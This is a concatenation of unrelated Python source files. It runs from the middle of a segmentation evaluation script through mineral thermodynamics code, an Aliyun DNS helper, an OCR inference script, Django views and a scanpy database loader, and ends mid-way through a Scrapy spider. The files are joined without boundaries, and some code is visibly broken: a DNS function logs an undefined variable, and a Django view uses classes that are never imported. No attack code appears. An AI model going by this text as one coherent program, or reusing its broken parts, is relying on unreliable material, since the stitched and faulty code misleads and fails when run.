= False for gt in pred['matched_gt']: overlap = float(gt['intersection']) / (gt['vert_count']+pred['vert_count']-gt['intersection']) if overlap > overlap_th: found_gt = True break if not found_gt: num_ignore = pred['void_intersection'] for gt in pred['matched_gt']: # group? if gt['instance_id'] < 1000: num_ignore += gt['intersection'] # small ground truth instances if gt['vert_count'] < min_region_size or gt['med_dist']>distance_thresh or gt['dist_conf'] 0: gt_copy = gt_inst.copy() pred_copy = pred_instance.copy() gt_copy['intersection'] = intersection pred_copy['intersection'] = intersection matched_gt.append(gt_copy) gt2pred[label_name][gt_num]['matched_pred'].append(pred_copy) pred_instance['matched_gt'] = matched_gt num_pred_instances += 1 pred2gt[label_name].append(pred_instance) return gt2pred, pred2gt def print_results(avgs): sep = "" col1 = ":" lineLen = 64 print("") print("#"*lineLen) line = "" line += "{:<15}".format("what" ) + sep + col1 line += "{:>15}".format("AP" ) + sep line += "{:>15}".format("AP_50%" ) + sep line += "{:>15}".format("AP_25%" ) + sep print(line) print("#"*lineLen) for (_,label_name) in enumerate(CLASS_LABELS): ap_avg = avgs["classes"][label_name]["ap"] ap_50o = avgs["classes"][label_name]["ap50%"] ap_25o = avgs["classes"][label_name]["ap25%"] line = "{:<15}".format(label_name) + sep + col1 line += sep + "{:>15.3f}".format(ap_avg ) + sep line += sep + "{:>15.3f}".format(ap_50o ) + sep line += sep + "{:>15.3f}".format(ap_25o ) + sep print(line) all_ap_avg = avgs["all_ap"] all_ap_50o = avgs["all_ap_50%"] all_ap_25o = avgs["all_ap_25%"] print("-"*lineLen) line = "{:<15}".format("average") + sep + col1 line += "{:>15.3f}".format(all_ap_avg) + sep line += "{:>15.3f}".format(all_ap_50o) + sep line += "{:>15.3f}".format(all_ap_25o) + sep print(line) print("") def write_result_file(avgs, filename): _SPLITTER = ',' with open(filename, 'w') as f: f.write(_SPLITTER.join(['class', 'class id', 'ap', 'ap50', 'ap25']) + '\n') for i in range(len(VALID_CLASS_IDS)): class_name = CLASS_LABELS[i] class_id = VALID_CLASS_IDS[i] ap = avgs["classes"][class_name]["ap"] ap50 = avgs["classes"][class_name]["ap50%"] ap25 = avgs["classes"][class_name]["ap25%"] f.write(_SPLITTER.join([str(x) for x in [class_name, class_id, ap, ap50, ap25]]) + '\n') def evaluate(pred_files, gt_files, pred_path, output_file): print('evaluating', len(pred_files), 'scans...') matches = {} for i in range(len(pred_files)): matches_key = os.path.abspath(gt_files[i]) # assign gt to predictions gt2pred, pred2gt = assign_instances_for_scan(pred_files[i], gt_files[i], pred_path) matches[matches_key] = {} matches[matches_key]['gt'] = gt2pred matches[matches_key]['pred'] = pred2gt sys.stdout.write("\rscans processed: {}".format(i+1)) sys.stdout.flush() print('') ap_scores = evaluate_matches(matches) avgs = compute_averages(ap_scores) # print print_results(avgs) if output_file: write_result_file(avgs, output_file) def main(): pred_files = [f for f in os.listdir(opt.pred_path) if f.endswith('.txt') and f != 'semantic_instance_evaluation.txt'] gt_files = [] if len(pred_files) == 0: util.print_error('No result files found.', user_fault=True) for i in range(len(pred_files)): gt_file = os.path.join(opt.gt_path, pred_files[i]) if not os.path.isfile(gt_file): util.print_error('Result file {} does not match any gt file'.format(pred_files[i]), user_fault=True) gt_files.append(gt_file) pred_files[i] = os.path.join(opt.pred_path, pred_files[i]) # evaluate evaluate(pred_files, gt_files, opt.pred_path, opt.output_file) if __name__ == '__main__': main() import os import numpy as np import scipy import os import matplotlib as mpl import matplotlib.pyplot as plt import matplotlib.ticker as mtick import pandas as pd from scipy import integrate path='output' if os.path.isfile('path_file.dat'): path_file=open('path_file.dat', 'r') path=path_file.readline().rstrip() path_file.close() class latex_class(): """ Setup for the use of LaTeX for axis labels and titles; sets of parameters for graphics output. """ def __init__(self): self.flag=False self.dpi=300 self.font_size=14 self.tick_size=12 self.ext='jpg' mpl.rc('text', usetex=False) def on(self): self.flag=True mpl.rc('text', usetex=True) def off(self): self.flag=False mpl.rc('text', usetex=False) def set_param(self, dpi=300, fsize=14, tsize=12, ext='jpg'): """ Args: dpi: resolution of the graphics file (default 300) fsize: size of the labels of the axes in points (default 14) tsize: size of the ticks in points (default 12) ext: extension of the graphics file (default 'jpg'); this argument is only used in those routines where the name of the file is automatically produced by the program (e.g. check_poly or check_spline functions). In other cases, the extension is directly part of the name of the file given as argument to the function itself, and 'ext' is ignored. """ self.dpi=dpi self.font_size=fsize self.tick_size=tsize self.ext=ext def get_dpi(self): return self.dpi def get_fontsize(self): return self.font_size def get_ext(self): return self.ext def get_tsize(self): return self.tick_size class name_data: def __init__(self): self.mineral_names=[] def add(self,nlist): self.mineral_names.extend(nlist) class mineral: def __init__(self,name,nick): self.name=name self.nick=nick self.eos='m' self.cp=[[0, 0]] self.al=[[0, 0]] self.k0=0. self.kp=0. self.dkt=0. self.v0=0. self.g0=0. self.s0=0. def info(self): print("Mineral: %s\n" % self.name) print("K0: %4.2f GPa, Kp: %4.2f, dK0/dT: %4.4f GPa/K, V0: %6.4f J/bar" \ % (self.k0, self.kp, self.dkt, self.v0)) print("G0: %8.2f J/mol, S0: %6.2f J/mol K\n" % (self.g0, self.s0)) print("EoS type: %s " % self.eos) print("Cp coefficients and powers:") for ci in self.cp: print('{:>+8.4e}{:>+6.1f}'.format(ci[0],ci[1])) print("\nAlpha coefficients and powers:") for ai in self.al: print('{:>+8.4e}{:>+6.1f}'.format(ai[0],ai[1])) def load_ref(self,v0,g0,s0): self.v0=v0 self.g0=g0 self.s0=s0 def load_bulk(self,k0, kp, dkt): self.k0=k0 self.kp=kp self.dkt=dkt def load_eos_type(self,eos): if eos==0: self.eos='m' else: self.eos='bm' def load_cp(self,cpc,cpp): cl=list(zip(cpc,cpp)) item=0 self.cp=np.array([]) for ic in cl: self.cp=np.append(self.cp,[cl[item][0], cl[item][1]]) item=item+1 self.cp=self.cp.reshape(item,2) def load_alpha(self, alc, alp): cl=list(zip(alc,alp)) item=0 self.al=np.array([]) for ic in cl: self.al=np.append(self.al,[cl[item][0], cl[item][1]]) item=item+1 self.al=self.al.reshape(item,2) def cp_t(self,tt): cpt=0. iterm=0 for it in self.cp: cpt=cpt+self.cp[iterm,0]*(tt**self.cp[iterm,1]) iterm=iterm+1 return cpt def alpha_t(self,tt): alt=0. iterm=0 for it in self.al: alt=alt+self.al[iterm,0]*(tt**self.al[iterm,1]) iterm=iterm+1 return alt def kt(self,tt): return self.k0+(tt-298.15)*self.dkt def entropy(self,tt): fc=lambda ti: (self.cp_t(ti))/ti integ, err=scipy.integrate.quad(fc,298.15,tt) return integ+self.s0 def volume_t(self,tt): fc= lambda ti: self.alpha_t(ti) integ,err=scipy.integrate.quad(fc,298.15,tt) # return (self.v0)*(1.+integ) return (self.v0)*np.exp(integ) def volume_p(self,tt,pp): k0t=self.kt(tt) vt=self.volume_t(tt) if self.eos=='m': fact=(1.-(pp*self.kp)/(pp*self.kp+k0t))**(1./self.kp) return fact*vt elif self.eos=='bm': pf=lambda f: (3*k0t*f*(1+2*f)**(5/2)*(1+3*f*(self.kp-4)/3)-pp)**2 ff=scipy.optimize.minimize(pf,1,tol=0.00001) return vt/((2*ff.x[0]+1)**(3/2)) def volume_fix_t_p(self,tt): return lambda pp: self.volume_p(tt,pp) def vdp(self,tt,pp): fv=self.volume_fix_t_p(tt) integ,err=scipy.integrate.quad(fv,0.000001, pp) return integ*1e4 def g_t(self,tt): integ,err=scipy.integrate.quad(self.entropy, 298.15, tt) return integ def g_tp(self,tt,pp): return self.g0+self.vdp(tt,pp)-self.g_t(tt) def alpha_p(self, tt, pp): v=self.volume_p(tt,pp) t_list=np.linspace(tt-10, tt+10, 5) vt_list=np.array([]) for ti in t_list: vi=self.volume_p(ti,pp) vt_list=np.append(vt_list,vi) fitpv=np.polyfit(t_list,vt_list,2) fitder1=np.polyder(fitpv,1) altp=np.polyval(fitder1,tt) return 1*altp/v def s_tp(self,tt,pp): gtp=lambda tf: self.g_tp(tf,pp) t_list=np.linspace(tt-5, tt+5, 5) g_list=np.array([]) for ti in t_list: gi=self.g_tp(ti,pp) g_list=np.append(g_list,gi) fit=np.polyfit(t_list,g_list,2) fitder=np.polyder(fit,1) return -1*np.polyval(fitder,tt) def h_tp(self,tt,pp): g=self.g_tp(tt,pp) s=self.s_tp(tt,pp) return g+tt*s latex=latex_class() name_list=name_data() ens=mineral("enstatite","en") cor=mineral("corindone","cor") py=mineral("pyrope","py") coe=mineral("coesite", "coe") q=mineral("quartz","q") fo=mineral("forsterite", "fo") ky=mineral("kyanite","ky") sill=mineral("sillimanite","sill") andal=mineral("andalusite","and") per=mineral("periclase","per") sp=mineral("spinel","sp") mao=mineral("maohokite","mao") fmao=mineral("fe-maohokite","fmao") stv=mineral("stishovite","stv") cc=mineral("calcite", "cc") arag=mineral("aragonite", "arag") jeff=mineral("jeffbenite", "jeff") jeff_fe=mineral("Fe-jeffbenite", "jeff_fe") jeff_fe3p=mineral("Fe3p-jeffbenite", "jeff_fe3p") jeff_feb=mineral("Feb-jeffbenite", "jeff_feb") def export(mineral_nick): al_power_dic={ 'b1': 0, 'b2': 1, 'b3': -1, 'b4': -2, 'b5': -0.5 } cp_power_dic={ 'c1': 0, 'c2': 1, 'c3': -2, 'c4': 2, 'c5': -0.5, 'c6': -1, 'c7': -3, 'c8': 3 } f=open('data_perplex.dat', 'a+') nick=mineral_nick+'.' alpha=eval(nick+'al') cp=eval(nick+'cp') g0=eval(nick+'g0') v0=eval(nick+'v0') s0=eval(nick+'s0') name=eval(nick+'nick') string_h=name+' '+'EoS = 2\n' string_ini='G0 = '+str(g0)+' S0 = '+str(round(s0,4))+' V0 = '+str(round(v0,4))+'\n' string_cp='' for cpi in cp: pi=cpi[1] for ki,vi in cp_power_dic.items(): if vi==pi: string_cp=string_cp+ki+' = '+str(round(cpi[0],6))+' ' string_al='' for ali in alpha: pi=ali[1] for ki,vi in al_power_dic.items(): if vi==pi: string_al=string_al+ki+' = '+str("%.6g" % ali[0])+' ' string_cp=string_cp+'\n' string_al=string_al+'b6 = '+str(round(eval(nick+'k0')*1e4,6))+' ' string_al=string_al+'b7 = '+str(round(eval(nick+'dkt')*1e4,6))+' ' if eval(nick+'eos')=='m': eos='b8 = '+str(round(eval(nick+'kp'),4)) elif eval(nick+'eos')=='bm': eos='b8 = '+str(round(-1*eval(nick+'kp'),4)) string_al=string_al+eos+'\n\n' f.write(string_h) f.write(string_ini) f.write(string_cp) f.write(string_al) f.close() print("Exported data set in data_perplex.dat, with the following content:\n") print(string_h+string_ini+string_cp+string_al) def load_database(): ens.load_ref(6.262,-2915760, 132.5) ens.load_bulk(107,4,-0.01605) ens.load_cp([356.2, -.299E-2, -596900, -3185.3],[0, 1, -2, -1./2]) ens.load_alpha([.505E-4, -.505E-3],[0, -1./2]) ens.eos='m' cor.load_ref(2.558, -1581710, 50.9) cor.load_bulk(252,4,-0.0347) cor.load_cp([139.5, .589E-2, -2460600,-589.2 ],\ [0, 1, -2, -1./2]) cor.load_alpha([.419E-4,-.419E-3],[0, -1./2]) cor.eos='m' py.load_ref(11.318,-5934105,266.30) py.load_bulk(173.7,4.00,-0.026055) py.load_cp([633.5, -5196100, -4315.2],\ [0, -2, -0.5]) py.load_alpha([0.436E-4, -0.436E-3],\ [0, -0.5]) py.eos='bm' load_database() # ----------- Reactions ------------------ def equilib(tini,tfin,npoint,pini=1,prod=['py',1], rea=['ens',1.5,'cor', 1],\ out=False, tex=False, title=True, save=''): """ Computes the equilibrium pressure for a reaction involving a given set of minerals, in a range of temperatures. Args: tini: minimum temperature in the range tfin: maximum temperature in the range npoint: number of points in the T range pini (optional): initial guess for the pressure prod: list of products of the reaction in the form [name_1, c_name_1, name_2, c_name_2, ...] where name_i is the name of the i^th mineral, as stored in the database, and c_name_i is the corresponding stoichiometric coefficient rea: list of reactants; same syntax as the "prod" list. Example: equilib(300, 500, 12, prod=['py',1], rea=['ens', 1.5, 'cor', 1]) """ if os.path.isfile("path_file.dat"): path_file=open("path_file.dat", "r") path=path_file.read() path=path.rstrip() lprod=len(prod) lrea=len(rea) prod_spec=prod[0:lprod:2] prod_coef=prod[1:lprod:2] rea_spec=rea[0:lrea:2] rea_coef=rea[1:lrea:2] lastr=rea_spec[-1] lastp=prod_spec[-1] prod_string='' for pri in prod_spec: prod_string=prod_string + pri if pri != lastp: prod_string=prod_string+' + ' rea_string='' for ri in rea_spec: rea_string = rea_string + ri if ri != lastr: rea_string=rea_string+' + ' t_list=np.linspace(tini,tfin,npoint) p_list=np.array([]) h_list=np.array([]) s_list=np.array([]) v_list=np.array([]) cs_list=np.array([]) for ti in t_list: pi=pressure_react(ti,pini, prod_spec, prod_coef, rea_spec, rea_coef) hprod=0. sprod=0. vprod=0. for pri, pci in zip(prod_spec, prod_coef): hprod=hprod+(eval(pri+'.h_tp(ti,pi)'))*pci sprod=sprod+(eval(pri+'.s_tp(ti,pi)'))*pci vprod=vprod+(eval(pri+'.volume_p(ti,pi)'))*pci hrea=0. srea=0. vrea=0. for ri,rci in zip(rea_spec, rea_coef): hrea=hrea+(eval(ri+'.h_tp(ti,pi)'))*rci srea=srea+(eval(ri+'.s_tp(ti,pi)'))*rci vrea=vrea+(eval(ri+'.volume_p(ti,pi)'))*rci hi=hprod-hrea si=sprod-srea vi=vprod-vrea dsdv_i=si/vi p_list=np.append(p_list,pi) h_list=np.append(h_list,hi) s_list=np.append(s_list,si) v_list=np.append(v_list,vi) cs_list=np.append(cs_list, dsdv_i) serie=(t_list.round(1),p_list.round(2),h_list.round(3), s_list.round(3), \ v_list.round(4), cs_list.round(2)) pd.set_option('colheader_justify', 'center') df=pd.DataFrame(serie, index=['T (K)','P (GPa)','DH(J/mol)', \ 'DS (J/mol K)', 'DV (J/bar)','Slope (bar/K)']) df=df.T df2=df.round(3) print("") print(df2.to_string(index=False)) ymax=max(p_list)+0.1*(max(p_list)-min(p_list)) ymin=min(p_list)-0.1*(max(p_list)-min(p_list)) xloc_py, yloc_py, xloc_en, yloc_en=field(tini,tfin, ymin, ymax, \ prod_spec, prod_coef, rea_spec, rea_coef) dpi=80 if tex: latex.on() dpi=latex.get_dpi() fontsize=latex.get_fontsize() ticksize=latex.get_tsize() print("\n") fig=plt.figure() ax=fig.add_subplot(111) if title: if latex.flag: ax.title.set_text("Reaction "+ rea_string + ' $\leftrightarrow$ ' + prod_string + "\n" ) else: ax.title.set_text("Reaction "+ rea_string + " <--> " + prod_string + "\n" ) ax.text(xloc_en, yloc_en, rea_string) ax.text(xloc_py,yloc_py, prod_string) ax.plot(t_list,p_list,"k-") ax.axis([tini,tfin,ymin,ymax]) ax.yaxis.set_major_locator(plt.MaxNLocator(5)) ax.yaxis.set_major_formatter(mtick.FormatStrFormatter('%.2f')) ax.xaxis.set_major_locator(plt.MaxNLocator(8)) ax.xaxis.set_major_formatter(mtick.FormatStrFormatter('%.1f')) if latex.flag: ax.set_xlabel("Temperature (K)", fontsize=fontsize) ax.set_ylabel("Pressure (GPa)", fontsize=fontsize) plt.xticks(fontsize=ticksize) plt.yticks(fontsize=ticksize) else: ax.set_xlabel("Temperature (K)") ax.set_ylabel("Pressure (GPa)") if save != '': plt.savefig(fname=path+'/'+ save,dpi=dpi, bbox_inches='tight') plt.show() latex.off() clap=np.polyfit(t_list,p_list,1) cl_s=clap[0]*1.e4 print("\nAverage Clapeyron Slope (from Delta S/Delta V): %6.2f bar/K" \ % cs_list.mean()) print("Clapeyron slope (from a linear fit of the P/T curve): %6.2f bar/K"\ % cl_s) if out: return t_list, p_list def reaction(tt,pp, prod_spec, prod_coef, rea_spec, rea_coef): """ Computes the Gibbs free energy of reaction at given temperature (tt) and pressure (pp), involving specified minerals. """ gprod=0. for pri, pci in zip(prod_spec, prod_coef): gprod=gprod+(eval(pri+'.g_tp(tt,pp)'))*pci grea=0. for ri,rci in zip(rea_spec, rea_coef): grea=grea+(eval(ri+'.g_tp(tt,pp)'))*rci return gprod-grea def pressure_react(tt,pini, prod_spec, prod_coef, rea_spec, rea_coef): """ Computes the pressure at which a given set of minerals is at the equilibrium for a specified temperature. "pini" is a initial guess for the pressure. Output in GPa. "pressure_react" calls "reactions, and it is invoked by "equilib". """ fpr=lambda pp: (reaction(tt,pp, prod_spec, prod_coef, rea_spec, rea_coef))**2 pres=scipy.optimize.minimize(fpr,pini,tol=1) return pres.x def field(tmin,tmax,pmin,pmax,\ prod_spec, prod_coef, rea_spec, rea_coef, nx=6, ny=6): t_range=np.linspace(tmin,tmax,nx) p_range=np.linspace(pmin,pmax,ny) fld=np.array([]) for ti in t_range: for pi in p_range: de=reaction(ti,pi,prod_spec, prod_coef, rea_spec, rea_coef) fld=np.append(fld,[ti,pi,de]) fld=fld.reshape(nx*ny,3) prodx=np.array([]) prody=np.array([]) reax=np.array([]) reay=np.array([]) for fi in fld: if fi[2]>0: reax=np.append(reax,fi[0]) reay=np.append(reay,fi[1]) else: prodx=np.append(prodx,fi[0]) prody=np.append(prody,fi[1]) return prodx.mean(), prody.mean(), reax.mean(), reay.mean() def import_database(): name_l=[] al_power_dic={ 'b1': 0, 'b2': 1, 'b3': -1, 'b4': -2, 'b5': -0.5, } cp_power_dic={ 'c1': 0, 'c2': 1, 'c3': -2, 'c4': 2, 'c5': -0.5, 'c6': -1, 'c7': -3, 'c8': 3 } list_cpc=[] list_cp=[] for ki,vi in cp_power_dic.items(): list_cpc.append(ki) list_cp.append(vi) list_cal=[] list_al=[] for ki,vi in al_power_dic.items(): list_cal.append(ki) list_al.append(vi) line='' with open('perplex_db.dat') as f: jc=0 l0=[''] while True: line=f.readline().rstrip() if line=='': continue if line == 'END': break jc=jc+1 line_s=line.split() if line_s != []: l0=line_s[0].rstrip() if l0=='#': continue name=l0 name_l.append(l0) l1=f.readline() l2=f.readline().rstrip() l2_s=l2.split() g0=float(l2_s[2]) s0=float(l2_s[5]) v0=float(l2_s[8]) l3=f.readline().rstrip() l3_s=l3.split() l3n=len(l3_s) coeff_cp=l3_s[2:l3n:3] coeff_cp=[float(ci) for ci in coeff_cp] power_ccp=l3_s[0:l3n:3] power=[] for cci in power_ccp: power.append(cp_power_dic.get(cci)) l4=f.readline().rstrip() l4_s=l4.split() l4n=len(l4_s) l4n_alpha=l4n-9 coeff_alpha=l4_s[2:l4n_alpha:3] coeff_alpha=[float(ai) for ai in coeff_alpha] power_ac=l4_s[0:l4n_alpha:3] power_a=[] for ai in power_ac: power_a.append(al_power_dic.get(ai)) k0=float(l4_s[-7])/1.e4 dkt=float(l4_s[-4])/1.e4 kp=float(l4_s[-1]) eos_flag=0 eos='m' if kp < 0.: eos='bm' kp=-1*kp eos_flag=1 eval(name+'.load_ref(v0,g0,s0)') eval(name+'.load_bulk(k0,kp,dkt)') eval(name+'.load_cp(coeff_cp,power)') eval(name+'.load_alpha(coeff_alpha,power_a)') eval(name+'.load_eos_type(eos_flag)') f.readline() line=f.readline().rstrip() f.close() name_list.add(name_l)hengwei-chan/fragmentation_and_assemble import pytest import pathlib import nbformat from nbconvert.preprocessors import ExecutePreprocessor ROOT_DIR = pathlib.Path(__file__).parent.resolve() NOTEBOOK_DIR = ROOT_DIR.parent / "docs" / "tutorials" NOTEBOOK_PATHS = NOTEBOOK_DIR.glob("*.ipynb") NOTEBOOK_PATHS = sorted(list(NOTEBOOK_DIR.glob("*.ipynb"))) @pytest.mark.skip_platform("win") @pytest.mark.parametrize("nb_path", NOTEBOOK_PATHS, ids=[str(n.name) for n in NOTEBOOK_PATHS]) def test_notebook(nb_path): # Setup and configure the processor to execute the notebook ep = ExecutePreprocessor(timeout=600, kernel_name="python3") # Open the notebook with open(nb_path) as f: nb = nbformat.read(f, as_version=nbformat.NO_CONVERT) # Execute the notebook ep.preprocess(nb, {"metadata": {"path": NOTEBOOK_DIR}}) fruits=[] fruits.append("apple") fruits.append("banana") fruits.append("orange") fruits.append("grape") print(fruits) fruits.insert(2,"cherry") print(fruits) del fruits[3] print(fruits)#!/usr/bin/env python # coding=utf-8 import json import logging from aliyunsdkalidns.request.v20150109.AddDomainRecordRequest import AddDomainRecordRequest from aliyunsdkalidns.request.v20150109.UpdateDomainRecordRequest import UpdateDomainRecordRequest from aliyunsdkalidns.request.v20150109.DescribeSubDomainRecordsRequest import DescribeSubDomainRecordsRequest import Debug import ResponseUtil def get_domain_record_id(response): """ :param response: :return: """ response = json.loads(response) if response: domain_records = response["DomainRecords"] if domain_records: record = domain_records["Record"] if record and len(record) > 0: return record[0]["RecordId"] return None def response_record_id(response): """ :param response: :return: """ response = json.loads(response) if response: return response["RecordId"] return None class DomainUtil(object): def __init__(self, client=None): self.client = client @ResponseUtil.debug(Debug.debugEnable, None) def record_id(self, sub_domain): """ :param sub_domain: :return: """ request = DescribeSubDomainRecordsRequest() request.set_accept_format('json') request.set_SubDomain(sub_domain) try: logging.info("Start to find domain record id for sub domain %s." % sub_domain) response = self.client.do_action_with_exception(request) if ResponseUtil.success(response): record = get_domain_record_id(str(response, encoding='utf-8')) if not record: raise ValueError("Record ID NullPointException") logging.info("Found domain record id %s for sub_domain : %s." % (record, sub_domain)) return True, record else: return False, str(response, encoding='utf-8') except Exception as e: logging.error("Failed to get description for domain %s" % sub_domain, e) return False, e @ResponseUtil.debug(Debug.debugEnable, None) def add(self, domain_type, rr, domain_name, value): """ :param domain_type: A :param rr: hk :param domain_name: *************** :param value: *************** :return: """ request = AddDomainRecordRequest() request.set_accept_format('json') request.set_Value(value) request.set_Type(domain_type) request.set_RR(rr) request.set_DomainName(domain_name) try: response = self.client.do_action_with_exception(request) if ResponseUtil.success(response): record_id = response_record_id(response) if record_id: logging.info("Successfully add domain information for : %s.%s to %s" % (rr, domain, value)) return True, None else: return False, str(response, encoding='utf-8') except Exception as e: logging.error("Failed to add sub domain parse information for %s.%s to %s" % (rr, domain, value), e) return False, e @ResponseUtil.debug(Debug.debugEnable, None) def update(self, record_id, domain_type, rr, value): """ :param record_id: *************** :param domain_type: A :param rr: hk :param value: *************** :return: """ request = UpdateDomainRecordRequest() request.set_accept_format('json') request.set_Value(value) request.set_Type(domain_type) request.set_RR(rr) request.set_RecordId(record_id) try: response = self.client.do_action_with_exception(request) if ResponseUtil.success(response): record_id = response_record_id(response) if record_id: logging.info("Successfully update domain parse information for %s to %s" % (record_id, value)) return True, None else: return False, str(response, encoding='utf-8') except Exception as e: logging.error("Failed to add sub domain parse information for %s to %s" % (record_id, value), e) return False, e def change(self, domain_type, rr, domain_name, eip): is_ok, record_id = self.record_id("%s.%s" % (rr, domain_name)) if is_ok: return self.update(record_id, domain_type, rr, eip) else: return self.add(domain_type, rr, domain_name, eip) py/cidoc_crm_types/properties/p179i_was_sales_price_of.py from dataclasses import dataclass @dataclass class P179iWasSalesPriceOf: URI = "http://erlangen-crm.org/current/P179i_was_sales_price_of" from typing import Dict, Optional import torch from overrides import overrides from allennlp.data import Vocabulary, TextFieldTensors from allennlp.models.model import Model from allennlp.modules import TextFieldEmbedder, Seq2SeqEncoder from allennlp.nn import InitializerApplicator from allennlp_models.generation.models import ComposedSeq2Seq from allennlp_models.generation.modules.seq_decoders.seq_decoder import SeqDecoder @Model.register("composed_seq2seq_kw") class ComposedSeq2SeqKW(ComposedSeq2Seq): """ Does everything that the standard composed_seq2seq model does but doesn't care if you pass additional arguments to forward() """ def __init__( self, vocab: Vocabulary, source_text_embedder: TextFieldEmbedder, encoder: Seq2SeqEncoder, decoder: SeqDecoder, tied_source_embedder_key: Optional[str] = None, initializer: InitializerApplicator = InitializerApplicator(), **kwargs, ) -> None: super(ComposedSeq2SeqKW, self).__init__(vocab, source_text_embedder, encoder, decoder, tied_source_embedder_key, initializer, **kwargs) @overrides def forward( self, # type: ignore source_tokens: TextFieldTensors, target_tokens: TextFieldTensors = None, **kwargs ) -> Dict[str, torch.Tensor]: return super().forward(source_tokens, target_tokens) 1-10 import os import json import torch import logging import pathlib import traceback import argparse from modules.utils.util import make_dir from modules.utils.util import predict from modules.models.model import OCRModel logging.basicConfig(level=logging.DEBUG, format='') def load_model(model_path, with_gpu): config = json.load(open('config.json')) logger.info("Loading checkpoint: {} ...".format(model_path)) checkpoints = torch.load(model_path, map_location='cpu') if not checkpoints: raise RuntimeError('No checkpoint found.') print('Epochs: {}'.format(checkpoints['epoch'])) state_dict = checkpoints['state_dict'] model = OCRModel(config) if with_gpu and torch.cuda.device_count() > 1: model.parallelize() model.load_state_dict(state_dict) if with_gpu: model.to(torch.device('cuda')) model.eval() return model def main(args: argparse.Namespace): model_path = args.model input_dir = args.input_dir output_dir = args.output_dir with_image = True if output_dir else False with_gpu = True if torch.cuda.is_available() else False # with_gpu = False if with_image: make_dir(os.path.join(output_dir, 'img')) model = load_model(model_path, with_gpu) types = ('*.jpg', '*.png', '*.JPG', '*.PNG') # the tuple of file types files_grabbed = [] for files in types: files_grabbed.extend(input_dir.glob(files)) for image_fn in files_grabbed: try: with torch.no_grad(): ploy, im = predict(image_fn, model, with_image, output_dir, with_gpu) print(image_fn, len(ploy)) except Exception as e: traceback.print_exc() print(image_fn) if __name__ == '__main__': logger = logging.getLogger() parser = argparse.ArgumentParser(description='Model eval') parser.add_argument('-m', '--model', default=None, type=pathlib.Path, required=True, help='path to model') parser.add_argument('-o', '--output_dir', default=None, type=pathlib.Path, help='output dir for drawn images') parser.add_argument('-i', '--input_dir', default=None, type=pathlib.Path, required=True, help='dir for input image') args = parser.parse_args() main(args) src/field_demarcation_revenue/views.py from django.shortcuts import render from django_tables2 import RequestConfig from .models import FieldDemarcationRevenue from .tables import FieldDemarcationRevenueTable # Create your views here. def fieldDemarcationRevenue(request): fieldDemarcationRevenue_Table = FieldDemarcationRevenueTable(FieldDemarcationRevenue.objects.all()) fieldDemarcationRevenue_Table.order_by="vdc" RequestConfig(request, paginate={"per_page":30}).configure(fieldDemarcationRevenue_Table) context = { "fieldDemarcationRevenue_Table": fieldDemarcationRevenue_Table } return render(request,"field_demarcation_revenue.html",context) def budget_nep(request): budget_table = BudgetTable(Budget.objects.all()) budget_table.order_by="budget_number" RequestConfig(request, paginate={"per_page":25}).configure(budget_table) context = { "budget_table": budget_table } return render(request,"budget_nep.html",context)""" Works with a directory of anndata objects which are the result of anndataize_ebi.py To run change the DATADIR and FULLPATHDB global run and run the script from the repos venv. python ebi_anndata_in.py """ import os import scanpy as sc from sqlalchemy import create_engine, Table, MetaData # Full path to the sqllite db FULLDBPATH = "/home/duncan/work/singlecelldb-ingest" # Path to the data directory filled with ebi anndata objects. DATADIR = "./data" # Connection to the database. dbstartstr = "sqlite:///%s" % FULLDBPATH engine = create_engine(dbstartstr, echo=True) metadata = MetaData() conn = engine.connect() # Accessor for each of the tables. dataset = Table('dataset', metadata, autoload=True, autoload_with=engine) cluster_solution_table = Table('cluster_solution', metadata, autoload=True, autoload_with=engine) cluster = Table('cluster', metadata, autoload=True, autoload_with=engine) cell_of_cluster = Table('cell_of_cluster', metadata, autoload=True, autoload_with=engine) def cluster_description(k): return "sc3 clusters k=%d from ebi's single cell atlas" % k def sc3_method_url(): return "http://bioconductor.org/packages/release/bioc/html/SC3.html" for filename in os.listdir(DATADIR): print(filename) ad = sc.read(os.path.join(DATADIR,filename)) name = filename.split("_ebi")[0] cell_count = ad.shape[0] data_source_url = ad.uns["view_data_url"] cluster_solution_names = ad.uns["sc3_cluster_solutions"] try: preferred_cluster_solution = ad.uns["sc3_preferred_cluster"] except KeyError: preferred_cluster_solution = None species = ad.uns["species"] description = ad.uns["short_description"] cluster_solutions = ad.obs[cluster_solution_names] dataset_ins = dataset.insert().values( name=name, species=species, cell_count=cell_count, description=description, data_source_url=data_source_url ) result = conn.execute(dataset_ins) dataset_key = result.inserted_primary_key for cluster_solution_name in cluster_solution_names: cluster_solution = cluster_solutions[cluster_solution_name].dropna() cluster_values = cluster_solution.unique().tolist() print("**************************************") print(cluster_values) k = len(cluster_values) cluster_sol_ins = cluster_solution_table.insert().values( name=cluster_solution_name, description=cluster_description(k), method="sc3", method_url=sc3_method_url(), dataset_id=dataset_key[0] ) result = conn.execute(cluster_sol_ins) cluster_sol_key = result.inserted_primary_key for cluster_value in cluster_values: cluster_ins = cluster.insert().values( name=str(cluster_value), cluster_solution_id=cluster_sol_key[0] ) result = conn.execute(cluster_ins) cluster_key = result.inserted_primary_key cell_ids = cluster_solution[cluster_solution == cluster_value].index cells = [dict(name=n, cluster_id=cluster_key[0]) for n in cell_ids] print(cells) conn.execute(cell_of_cluster.insert(), cells) vietzerg/Scrape-Finance-Data-v2 # Used for getting the list of companies in the same industry import json import logging import os import sys import traceback from datetime import date import redis import scrapy from scrapy import FormRequest from scrapy.crawler import CrawlerProcess from scrapy.exceptions import DontCloseSpider from scrapy.utils.log import configure_logging from scrapy_redis import defaults from scrapy_redis.spiders import RedisSpider from scrapy_redis.utils import bytes_to_str import scraper_vietstock.spiders.models.utilities as utilities from scraper_vietstock.helpers.fileDownloader import save_jsonfile from scraper_vietstock.spiders.scraperVSRedis import scraperVSRedisSpider from scraper_vietstock.spiders.models.counterparts import count_data from scraper_vietstock.spiders.models.counterparts import find_data as ctp from scraper_vietstock.spiders.models.counterparts import name, settings class counterPartsHandler(scraperVSRedisSpider): name = name custom_settings = settings def __init__(self, *args, **kwargs): super(counterPartsHandler, self).__init__(*args, **kwargs) self.date = str(date.today().strftime("%Y-%m-%d")) self.idling = False def next_requests(self): """ Replaces the default method. Closes spider when tickers are crawled and queue empty. """ use_set = self.settings.getbool( 'REDIS_START_URLS_AS_SET', defaults.START_URLS_AS_SET) fetch_one = self.server.spop if use_set else self.server.lpop found = 0 while found < self.redis_batch_size: data = fetch_one(self.redis_key) if not data: break params = bytes_to_str(data, self.redis_encoding).split(";") ticker = params[0] self.idling = False try: pageSize = params[1] req = self.make_request_from_data(ticker, pageSize) if req: yield req else: self.logger.info("Request not made from data: 